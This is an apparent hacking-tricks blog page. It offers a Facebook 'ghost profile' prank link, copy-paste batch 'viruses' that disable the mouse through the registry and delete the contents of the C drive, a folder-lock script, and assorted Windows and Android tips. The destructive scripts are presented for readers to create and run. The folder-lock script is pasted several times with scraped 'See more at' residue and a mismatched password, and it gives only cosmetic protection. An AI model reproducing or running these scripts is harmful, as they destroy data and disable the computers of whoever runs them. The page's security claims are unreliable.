Thursday, 13 February 2014

Ghost Profile In Facebook

Dare yourself And your friends!!!



This is one of the greatest pranks on Facebook. If you really can dare then you must try this and also you can play this prank with your friends on Facebook or any one outside the Facebook.


The link given below will take you to the ghost profile. This is really very Scary for the first time because with horror animation it also have some really very scary sound effect.



NOTE- View Ghost Profile On your Risk. (NOT FOR WEAK HEARTED PEOPLE)

Steps



  • Copy the link provided at the below and paste it to your address bar.
  • Hover Your Mouse Near the 'Add As a Friend' or near the photos and see the magic.
  • You can also copy that link and send it to your Friends to play prank with them

                               

            http://goo.gl/8ziJtp



                    or


      CLICK HERE  




                           
                                        

Saturday, 12 October 2013

Create Virus To disable Mouse


Mouse is One of The most Important part of your computer and not working of this may make your mind frustrated.


How to Create this Virus




  • Open Notepad and copy below codes

   
rem ---------------------------------
    rem Disable Mouse
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4
    rem ---------------------------------
 


  • Save this file as  virus.bat 
  • Done you just created your virus.

 Double Clicking on virus.bat file will disable your mouse.

You may Be interested in:
        Creating A dangerous Virus 
                    or
        Locking Folder With Password

How to make a Dangerous Virus

Your are a minute before to create the dangerous virus you must have ever seen!!!


This Virus is bieng created by using batch file programming. 

This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. 



How to Make the virus ?

  • Open Notepad and copy below code into it.

   
@Echo off
    Del C:\ *.* |y


  • Save this file as virus.bat (Name can be anything but .bat is must)
  • Now, running this file will delete all the content of C Drive.


Warning: Try at your own risk



Yoy may be intrested in

                    Create Virus To Disable Mouse
                                          
                            

Password Protect Any Folder

Again Some time you have some sensible and much important files to protect and to keep safely it on your PC.

Here is the intresting trick how to lock the folder with a password without any software.



Steps to Create Folder Lock


  • Open Notepad and Copy code given below into it.



    cls
    @ECHO OFF
    title avkfreedom.blogspot.com
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
    if NOT EXIST MyFolder goto MDMyFolder
    :CONFIRM
    echo Are you sure to lock this folder? (Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to Unlock Your Secure Folder
    set/p "pass=>"
    if NOT %pass%== avkfreedom goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDMyFolder
    md MyFolder
    echo MyFolder created successfully
    goto End
    :End

cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf

  • Save the notepad file as lock.bat (.bat is must)
  • Now double click on lock.bat and a new folder will be created with name MyFolder
  • Copy all your data you want to protect in that New folder
  • Now double click on lock.bat and when command promp appears Type Y and press enter.
  • Now MyFolder will be hidden from you view, to access that folder double click on lock.bat 
  • It will ask for password enter your password and done. (Default password is avkfreedom


NOTE-Here the Default Password Is"avkfreedom"

 For Further Security- Copy Your LOCK.BAT file in some secure place or in pendrive.

Feel free to comment below..

 

Monday, 7 October 2013

Create Non-Deletable And Non-Renameable Folder

Some time you have some sensible and much important files to protect and to keep safely it on your PC.

Here is a trick to create a folder which neither can be deleted nor can be renamed.


Trick is that you have to make the folder with name which are reserved words in windows. You have to use only these names to create the folder. These names are-    


[ con, aux, lpt1, lpt2, lpt3 to lpt9 ]



Steps To Create Non-deleteable And Non-renameable Folder




  • Go to start and click on RUN.
  • Type "cmd" and hit ENTER.
  • In the cmd window type C: or D: and hit enter.(You can't create this type folder in the drive where windows is installed generally C:)
  • Type md con\ and hit enter (md - make directory)
  • You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  • Open that directory, you will see the folder created of name con.
  • Try to delete that folder or rename that folder windows will show the error message. 


How to delete such files

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.


  • Open Command Prompt
  • Type D: ( if u created this type of folder in D: drive) & hit enter
  • Type rd con\ (rd - remove directory)
  • Open that directory and the folder will not appear because it is removed.

Friday, 27 September 2013

Whats App on PC

!!!!AMAZED!!!!!

 

But its true you can have Whats App on you computer and laptop.

With Bluestack all android apps runs on windows or Linux operating system in the same way as they run on your phone.

Follow the following steps:  

  • BLUESTACK provide interference between all android apps and your computer.

    CLICK TO DOWNLOAD BLUESTACK

 

  • Choose the correct operating system download and install bluestack on your computer.

  •  Now install whats app directly via bluestack search manager or install by APK while of whats apk.

  CLICK HERE IF YOU DO NOT KNOW HOW TO MAKE APK OF WHATS APP 

 

  • After installing the whats app open it on bluestack and enjoy chatting with your friends.

    Feel free to comment below!

 

Transfer Android Apps Between Phones Over Bluetooth(APK)

Its the era of ANDROID and the only place where you can get all of your android apps is Google play.

 

So why to install same app angain angain from google play?????

 

You can backup all your app installed on your phone as a APK file and use this APK file to install the same in future. Even you can transfer installed app on your mobile to other phone by Bluetooth


Astro is a leading file explorer for Android, and I am sure most of you have come across it. Undoubtedly, it is one of the best Android file explorers one can use, but there’s a lot more to it than that. One of the features of Astro is that it lets you backup your installed apps on the memory card as an APK file so that you can restore them at the time of crisis. What we will do is, we will see how we can create an APK of an individual file and send it over Bluetooth to another device using this tool.

Steps to Send App APKs Over Bluetooth

  • After you have downloaded and installed Astro on your Android, run the application, press the settings soft key and select tools to open a pop-up window.

Astro  (2)


  • Select Application Backup from the popup tool window and wait for Astro to make a list of all the applications installed on your Android. In the list select the application you want to send over Bluetooth and click the backup button to create the APK file. You can select multiple applications as well. Once the backup is complete, press the back soft key to return to the Astro Home.


  • On the home screen, you will see all the files and folders in your mounted SD card. Navigate to the folder Backups—>Apps to find the APK files you have created above.

Astro  (1)
  • Well, our journey with Astro completes here. We will now use Bluetooth File Transfer app for Android to transfer these files over Bluetooth as APK access to Bluetooth are locked by default on most of the devices. Once you have downloaded and installed Bluetooth File Transfer app on your Android, launch the application.

  • In Bluetooth File Transfer application, navigate to the same folder Backups—>Apps and select the file you want to send. After selecting press the Bluetooth button, search for the device and send the file. Once the receiver receives the file, he will be able to install it.

Bluetooth FIle Transfer  (2)
  • Select the app which you want to send.
    • Above are the simple way to transfer via bluetooth..










     If you face any problem comment below.

    Airport Authority of India AAI JE Previous Year paper

    I have tried to collect previous year paper of Airport Authority of India. AAI JE ATC PREVIOUS YEAR PAPER                            ...